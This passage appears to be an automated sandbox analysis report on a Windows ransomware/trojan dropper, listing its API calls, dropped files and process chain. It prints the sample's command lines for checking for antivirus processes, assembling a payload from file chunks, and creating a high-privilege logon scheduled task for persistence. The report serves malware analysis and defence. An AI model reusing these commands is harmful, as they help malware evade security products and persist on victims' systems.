    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00364614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00364614
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B14614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,21_2_00B14614
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00364416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,17_2_00364416
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0037CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,17_2_0037CEDF
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B2CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,21_2_00B2CEDF

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Fighting entropy: 7.99892313786Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\June entropy: 7.99829631291Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Massachusetts entropy: 7.99846554018Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Radius entropy: 7.99902505433Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Stockings entropy: 7.99820786051Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Bdsm entropy: 7.99861815368Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Vendor entropy: 7.99556101212Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Convenience entropy: 7.99573659303Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Joke entropy: 7.99883402213Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Severe entropy: 7.99824795157Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Falls entropy: 7.99917331785Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Sig entropy: 7.9984885368Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Outreach entropy: 7.99921983985Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Dental entropy: 7.99901607447Jump to dropped file
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\Mask entropy: 7.99382891469Jump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\369580\Z entropy: 7.99991695551Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile created: C:\Users\user\AppData\Local\LinkGuard Dynamics\r entropy: 7.99991695551Jump to dropped file

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js"
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003540C1: CreateFileW,DeviceIoControl,CloseHandle,17_2_003540C1
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00348D11 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,17_2_00348D11
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003555E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_003555E5
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B055E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,21_2_00B055E5
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile created: C:\Windows\SysWOW64\GroupPolicy\gpt.iniJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile created: C:\Windows\System32\GroupPolicy\MachineJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile created: C:\Windows\System32\GroupPolicy\UserJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile created: C:\Windows\System32\GroupPolicy\Machine\Registry.polJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile created: C:\Windows\System32\GroupPolicy\GPT.INIJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_0040497C0_2_0040497C
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_00406ED20_2_00406ED2
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_004074BB0_2_004074BB
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_002FB02017_2_002FB020
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_002F94E017_2_002F94E0
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_002F9C8017_2_002F9C80
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003781C817_2_003781C8
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0031232517_2_00312325
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0032643217_2_00326432
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0032258E17_2_0032258E
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_002FE6F017_2_002FE6F0
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0031275A17_2_0031275A
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0037080217_2_00370802
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003288EF17_2_003288EF
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003269A417_2_003269A4
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00300A5117_2_00300A51
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0034EB9517_2_0034EB95
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00300BE017_2_00300BE0
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00370C7F17_2_00370C7F
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00358CB117_2_00358CB1
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0031CC8117_2_0031CC81
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00326F1617_2_00326F16
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_002F32EB17_2_002F32EB
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003132E917_2_003132E9
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0031F33917_2_0031F339
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0030D45717_2_0030D457
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0030F57E17_2_0030F57E
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003115E417_2_003115E4
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_002F166317_2_002F1663
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_002FF6A017_2_002FF6A0
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003177F317_2_003177F3
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0031DAD517_2_0031DAD5
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00311AD817_2_00311AD8
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00329C1517_2_00329C15
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0030DD1417_2_0030DD14
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00311EF017_2_00311EF0
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0031BF0617_2_0031BF06
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B281C821_2_00B281C8
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AC232521_2_00AC2325
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AD643221_2_00AD6432
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AD258E21_2_00AD258E
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AAE6F021_2_00AAE6F0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AC275A21_2_00AC275A
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AD88EF21_2_00AD88EF
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B2080221_2_00B20802
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AD69A421_2_00AD69A4
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AFEB9521_2_00AFEB95
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AB0BE021_2_00AB0BE0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B08CB121_2_00B08CB1
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00ACCC8121_2_00ACCC81
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B20C7F21_2_00B20C7F
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AD6F1621_2_00AD6F16
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AAB02021_2_00AAB020
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AC32E921_2_00AC32E9
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00ACF33921_2_00ACF339
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AA94E021_2_00AA94E0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00ABD45721_2_00ABD457
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AC15E421_2_00AC15E4
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00ABF57E21_2_00ABF57E
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AAF6A021_2_00AAF6A0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AA166321_2_00AA1663
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AC77F321_2_00AC77F3
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AC1AD821_2_00AC1AD8
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00ACDAD521_2_00ACDAD5
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AA9C8021_2_00AA9C80
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AD9C1521_2_00AD9C15
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00ABDD1421_2_00ABDD14
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AC1EF021_2_00AC1EF0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00ACBF0621_2_00ACBF06
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_01074BD021_2_01074BD0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0109812021_2_01098120
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0107E17021_2_0107E170
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010931A021_2_010931A0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FD002D21_2_00FD002D
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FC71A021_2_00FC71A0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0102308021_2_01023080
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010B20D021_2_010B20D0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010860E021_2_010860E0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0103432021_2_01034320
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00F9A2C021_2_00F9A2C0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010A226021_2_010A2260
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FD036F21_2_00FD036F
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0109A2B021_2_0109A2B0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010A455021_2_010A4550
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010CF55021_2_010CF550
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0101F59021_2_0101F590
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010885F021_2_010885F0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0102044021_2_01020440
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0108045021_2_01080450
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FBF58021_2_00FBF580
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0108A48021_2_0108A480
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0108773021_2_01087730
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010D776021_2_010D7760
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010C97B021_2_010C97B0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010777E021_2_010777E0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FE261021_2_00FE2610
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0103361021_2_01033610
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FE47BF21_2_00FE47BF
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010D86C021_2_010D86C0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0108A93021_2_0108A930
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0108796021_2_01087960
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010D697021_2_010D6970
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0107F9A021_2_0107F9A0
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_0108282021_2_01082820
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FCC96021_2_00FCC960
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FCA92821_2_00FCA928
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_01088B4021_2_01088B40
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: String function: 00310C42 appears 70 times
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: String function: 00301A36 appears 34 times
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: String function: 00318A60 appears 42 times
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: String function: 004062A3 appears 57 times
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: String function: 00AB1A36 appears 34 times
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: String function: 00AC8A60 appears 42 times
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: String function: 010D7510 appears 62 times
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: String function: 00AC0C42 appears 70 times
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: String function: 00FC4380 appears 39 times
    Source: 5daucomrx8.exe, 00000000.00000003.1560779161.0000000002900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs 5daucomrx8.exe
    Source: 5daucomrx8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 5daucomrx8.exeStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
    Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@30/56@2/1
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035A51A GetLastError,FormatMessageW,17_2_0035A51A
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00348BCC AdjustTokenPrivileges,CloseHandle,17_2_00348BCC
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0034917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_0034917C
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AF8BCC AdjustTokenPrivileges,CloseHandle,21_2_00AF8BCC
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00AF917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,21_2_00AF917C
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00310D68 CloseHandle,CreateToolhelp32Snapshot,17_2_00310D68
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003542AA __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,17_2_003542AA
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifFile created: C:\Users\user\AppData\Local\LinkGuard DynamicsJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile created: C:\Users\user\AppData\Local\Temp\nse5752.tmpJump to behavior
    Source: 5daucomrx8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Origin.pif, Origin.pif, 00000015.00000002.3983668133.0000000000F90000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
    Source: Origin.pif, 00000015.00000002.3983668133.0000000000F90000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
    Source: 5daucomrx8.exeReversingLabs: Detection: 31%
    Source: C:\Users\user\Desktop\5daucomrx8.exeFile read: C:\Users\user\Desktop\5daucomrx8.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\5daucomrx8.exe "C:\Users\user\Desktop\5daucomrx8.exe"
    Source: C:\Users\user\Desktop\5daucomrx8.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 369580
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomsCompoundInjection" Participants
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\Z
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\369580\Origin.pif 369580\Origin.pif 369580\Z
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST
    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif" "C:\Users\user\AppData\Local\LinkGuard Dynamics\r"
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifProcess created: C:\Users\user\AppData\Local\Temp\369580\Origin.pif C:\Users\user\AppData\Local\Temp\369580\Origin.pif
